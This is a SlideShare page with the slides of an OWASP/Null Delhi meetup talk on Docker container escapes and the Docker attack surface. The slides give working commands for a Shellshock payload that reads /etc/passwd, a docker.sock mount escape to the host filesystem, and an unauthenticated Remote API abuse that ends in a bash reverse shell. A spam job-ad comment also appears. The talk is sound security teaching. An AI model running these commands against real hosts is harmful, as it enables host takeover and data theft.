Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Demystifying Container Escapes

93 views

Published on

In this OWASP/Null Delhi session, I discussed the docker attack surface. Furthermore, I demonstrated how an attacker can escape the docker container and gain access to the host machine.

Ref: https://null.co.in/events/655-delhi-combined-null-delhi-owasp-delhi-meetup

Published in: Software
  • Positions Available Now! We currently have several openings for social media workers. ▲▲▲ http://t.cn/AieX6y8B
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Be the first to like this

Demystifying Container Escapes

  1. 1. Vaibhav Gupta Twitter: @VaibhavGupta_1 Its all about Docker!
  2. 2. § About Docker – 1 min Primer § Cgroups & Namespaces – Quick Demo § Docker Attack Surface 1. Exploiting Vulnerable Images 2. Docker --privilege flag 3. Privilege Esc. Using Docker.Sock 4. Abusing Docker Remote API
  3. 3. § Docker is just way of running processes with limited privileges § DEMO § docker run -it ubuntu sh § ps aux | grep sleep
  4. 4. § Cgroups § docker run -itd --pids-limit 5 alpine § sleep 10 & sleep 10 & sleep 10 & sleep 10 & sleep 10 & sleep 10 § Namespaces (E.g. User Names) § vi /tmp/root-file.txt § docker run -itd -v /tmp:/shared alpine § Edit the file within container § Mitigation § sudo dockerd --userns-remap=default
  5. 5. DOCKER ATTACK SURFACE
  6. 6. • Vulnerable Images • Container running with unintended privileges • Docker Daemon Misconfigurations • Un-Auth Docker Client Remote API • Misconfigured or Vulnerable Hosts • Insecure Registry • Backdoored Images • ??
  7. 7. EXPLOITING VULNERABLE IMAGES § Sample Vulnerable App § docker run --rm -it -p 8080:80 vulnerables/cve-2014-6271 § Exploitation § curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://vulnerable-server:8080/cgi- bin/vulnerable
  8. 8. § Some Container require /var/run/docker.sock to be mounted on containers § It is required if docker container requires to interact with host § For e.g. – ‘Dockerized’ Host Monitoring Application ü docker run -itd -v /var/run/docker.sock:/var/run/docker.sock alpine ü docker exec -it <id> sh ü apk update ü apk add -U docker ü docker -H unix:///var/run/docker.sock run -it -v /:/test:ro -t alpine sh
  9. 9. § Allows to interact with remote Docker Daemon § No authentication required - By Default § Lets gain shell! ü sudo apt install jq ü sudo vi /lib/systemd/system/docker.service ü ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375 ü sudo systemctl daemon-reload ü sudo service docker restart ü curl http://localhost:2375/containers/json | jq ü docker -H tcp://localhost:2375 run --rm -v /:/mnt ubuntu chroot /mnt /bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/8080 0>&1"
  10. 10. § docker run -itd alpine § docker run --rm -it --cap-drop=NET_RAW alpine sh § ping 127.0.0.1 -c 2 § Printing Capabilities: capsh --print
  11. 11. § https://docs.docker.com/engine/security/security/ § https://docs.docker.com/engine/security/userns-remap/ § https://securityboulevard.com/2019/02/abusing-docker-api-socket/
  12. 12. § Email:Vaibhav.Gupta @ owasp.org § Twitter: @VaibhavGupta_1 § Blog: https://exploits.work

×